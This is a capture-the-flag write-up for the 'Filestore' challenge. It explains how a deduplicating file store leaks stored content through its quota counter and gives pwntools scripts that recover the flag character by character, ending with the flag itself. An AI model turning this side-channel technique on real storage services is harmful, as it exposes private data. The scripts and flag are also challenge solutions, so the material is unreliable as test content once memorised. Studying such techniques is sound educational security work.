Filestore
We stored our flag on this platform, but forgot to save the id. Can you help us restore it?

Analysis

When running the program, we have 4 options.
1
➜ Google ./filestore.py
2
Welcome to our file storage solution.
3
​
4
Menu:
5
- load
6
- store
7
- status
8
- exit
Copied!
Let's first look at the source code for saving and loading files.
First, all data is stored in blob:
1
# It's a tiny server...
2
blob = bytearray(2**16)
3
files = {}
4
used = 0
Copied!
The storing of data works through deduplication. I've added some comments to the source code to make it more understandable:
1
# Use deduplication to save space.
2
def store(data):
3
nonlocal used
4
MINIMUM_BLOCK = 16
5
MAXIMUM_BLOCK = 1024
6
part_list = []
7
while data:
8
prefix = data[:MINIMUM_BLOCK]
9
ind = -1
10
bestlen, bestind = 0, -1
11
​
12
# Find the best 'matching' part of the blob
13
while True:
14
ind = blob.find(prefix, ind+1)
15
if ind == -1: break
16
length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
17
if length > bestlen:
18
bestlen, bestind = length, ind
19
​
20
# Store the index of the match
21
if bestind != -1:
22
part, data = data[:bestlen], data[bestlen:]
23
part_list.append((bestind, bestlen))
24
​
25
# Append to the end
26
else:
27
part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
28
blob[used:used+len(part)] = part
29
part_list.append((used, len(part)))
30
used += len(part)
31
assert used <= len(blob)
32
​
33
fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
34
files[fid] = part_list
35
​
36
return fid
Copied!
Each 'file' is essentially represented by indices on the blob bytearray. If the new data is a duplicate of existing data, then no new data is stored onto the bytearray. Instead, the file is represented by an index pointing to the duplicated data.
For the purposes of analysis, we can print the first few bytes of blob and the part_list.
Here's an example:
1
➜ Google ./filestore.py
2
Welcome to our file storage solution.
3
​
4
# Saving the flag into the blob
5
bytearray(b'testflag\x00\x00')
6
[(0, 8)]
7
​
8
Menu:
9
- load
10
- store
11
- status
12
- exit
13
store
14
Send me a line of data...
15
test
16
​
17
# Duplicated data at index 0
18
bytearray(b'testflag\x00\x00')
19
[(0, 4)]
20
​
21
Stored! Here's your file id:
22
tObXrn5TRAMIGl6W
Copied!
Now, if we look at the status command, we see that the 'Quota' represents the used space in the blob bytearray. Since duplicated data was stored, the quota remains at 0.008kB.
1
status
2
User: ctfplayer
3
Time: Mon Jul 19 00:16:34 2021
4
Quota: 0.008kB/64.000kB
5
Files: 2
Copied!
This is very helpful to us - it allows us to check whether the data we are storing is a substring of the flag. If it is a substring, then the quota should remain the same. Otherwise, new data is stored and the used quota increases.

Solving

This observation allows us to do a fairly trivial check for which characters are found in the flag. By sending each possible character and checking the quota value afterwards, we can confirm whether or not that character is found in the flag.
1
from pwn import *
2
import string
3
import re
4
​
5
result = ''
6
​
7
conn = remote('filestore.2021.ctfcompetition.com', 1337)
8
conn.recv()
9
conn.recv()
10
conn.send('status\r\n')
11
​
12
received = conn.recvuntil('Menu').decode()
13
match = re.search(r'Quota: (.+)/64.000kB', received)
14
​
15
target_quota = match[1]
16
​
17
conn.close()
18
​
19
valid = []
20
​
21
for char in string.ascii_letters + string.digits + '{}_':
22
conn = remote('filestore.2021.ctfcompetition.com', 1337)
23
conn.recv()
24
conn.send('store\r\n')
25
conn.recv()
26
conn.send(f'{char}\r\n')
27
conn.recvuntil('Menu')
28
​
29
conn.send('status\r\n')
30
received = conn.recvuntil('Menu').decode()
31
match = re.search(r'Quota: (.+)/64.000kB', received)
32
​
33
quota = match[1]
34
if quota == target_quota:
35
print(f"{char} works!")
36
valid.append(char)
37
​
38
conn.close()
39
​
40
print(valid)
Copied!
But how do we get the flag? Checking each possible permutation of these valid characters would take too long, but we can reduce the time complexity by checking valid 2-character permutations, then combine these to check for valid 4-character permutations, and so on. This reduces the total number of permutations we have to check since it eliminates a lot of possible permutations early on.
1
from itertools import product
2
​
3
valid_n_chars = {1: valid}
4
​
5
LEN_FLAG = 26
6
​
7
i = 2
8
while i <= LEN_FLAG:
9
​
10
result = []
11
​
12
permutations = [''.join(x) for x in product(valid_n_chars[i // 2], repeat = 2)]
13
num_permutations = len(permutations)
14
​
15
count = 0
16
for permutation in permutations:
17
flag = ''.join(permutation)
18
​
19
print(f"Trying {flag}...")
20
​
21
conn = remote('filestore.2021.ctfcompetition.com', 1337)
22
conn.recv()
23
conn.send('store\r\n')
24
conn.recv()
25
conn.send(f'{flag}\r\n')
26
conn.recvuntil('Menu')
27
​
28
conn.send('status\r\n')
29
received = conn.recvuntil('Menu').decode()
30
match = re.search(r'Quota: (.+)/64.000kB', received)
31
​
32
quota = match[1]
33
if quota == target_quota:
34
print(f"{flag} works!")
35
result.append(flag)
36
​
37
conn.close()
38
​
39
if count % 10 == 0:
40
print('Progress:', count / num_permutations)
41
count += 1
42
​
43
valid_n_chars[i] = result
44
i *= 2
45
​
46
print('Valid results:', result)
Copied!
This eventually outputs all valid 16-character substrings of the flag.
From here, we can reconstruct the flag: CTF{CR1M3_0f_d3dup1ic4ti0n}
Copy link